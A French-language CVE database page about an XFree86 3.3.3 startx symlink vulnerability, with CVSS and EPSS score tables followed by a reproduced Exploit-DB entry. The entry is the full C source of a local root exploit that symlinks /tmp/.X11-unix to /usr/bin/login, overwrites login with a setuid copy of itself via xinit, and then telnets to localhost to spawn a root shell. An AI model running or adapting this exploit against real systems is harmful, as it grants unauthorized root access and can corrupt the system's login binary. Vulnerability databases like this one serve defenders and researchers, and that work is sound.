CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
4.6
AV:L/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.76%
–
–
2022-03-27
–
–
1.76%
–
–
2022-04-03
–
–
1.76%
–
–
2022-04-17
–
–
1.76%
–
–
2022-08-28
–
–
1.76%
–
–
2023-03-05
–
–
1.76%
–
–
2023-03-12
–
–
–
0.04%
–
2024-01-14
–
–
–
0.04%
–
2024-02-25
–
–
–
0.04%
–
2024-04-14
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2024-06-09
–
–
–
0.04%
–
2024-10-27
–
–
–
0.04%
–
2024-12-15
–
–
–
0.04%
–
2024-12-22
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.17%
2025-03-30
–
–
–
–
0.17%
2025-04-15
–
–
–
–
0.17%
2025-05-01
–
–
–
–
0.17%
2025-05-04
–
–
–
–
0.17%
2025-05-04
–
–
–
–
0.17,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 1999-03-20 23h00 +00:00 Auteur : Stealthf0rk EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/326/info
There is a symlink vulnerability known to exist under most modern linux and NetBSD distributions. It involves /tmp/.X11-unix and the tendency to follow to/overwrite the file pointed to if a symlink. It may be possible for a regular user to write arbritrary data to a file they normally have no write access to resulting in a root compromise.
/*** local XFree 3.3.3-symlink root-compromise.
*** Tested under FreeBSD 3.1 (but should work on others 2)
*** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G.
*** (check out http://www.kalug.lug.net/stealth or /coding for
*** other kewl stuff!)
***
*** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.
*** Even if this program restores all, you should backup your
*** login before running this.
***/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#define LOGIN "/usr/bin/login"
#define TELNET "/usr/bin/telnet"
int cp(const char*, const char*, int);
int main(int argc, char **argv)
{
char *telnet[] = {TELNET, "localhost", NULL};
char *shell[] = {"/bin/sh", NULL};
char *X[] = {"/usr/X11R6/bin/xinit", NULL};
FILE *f = NULL;
int p = 0;
char buf[1000] = {0};
/* the rootshell */
if (!geteuid() || !getuid()) {
unlink(LOGIN);
cp("/tmp/L", LOGIN, 1);
chmod(LOGIN, 04555);
printf("Welcome!\n");
unlink("/tmp/.X11-unix");
unlink("/tmp/L");
execve(*shell, shell, NULL);
}
/* back up */
cp(LOGIN, "/tmp/L", 1);
if (symlink(LOGIN, "/tmp/.X11-unix") < 0) {
perror("symlink (/tmp/.X11-unix)");
exit(errno);
}
if ((p = fork()) < 0) {
perror("fork");
exit(errno);
} else if (p > 0) {
sleep(7);
kill(p, 9);
cp(argv[0], LOGIN, 1);
execve(telnet[0], telnet, NULL);
perror("fatal:");
} else {
printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n");
printf("\n-> Please give me some seconds... <-\n\n");
execve(X[0], X, NULL);
}
return 0;
}
int cp(const char *from, const char *to, int how)
{
int in = 0, out = 0, r = 0;
char buf[1000] = {0};
printf("cp %s %s\n", from, to);
/* overwrite ? */
if (how == 1)
how = O_RDWR|O_TRUNC|O_CREAT;
else
how = O_RDWR|O_CREAT;
if ((out = open(to, how)) < 0) {
perror("open 1");
exit(errno);
}
if ((in = open(from, O_RDONLY)) < 0) {
perror("open 2");
exit(errno);
}
while ((r = read(in, buf, 1000-1)) > 0) {
write(out,buf,r);
memset(buf,0,1000);
}
close(in); close(out);
return 0;
}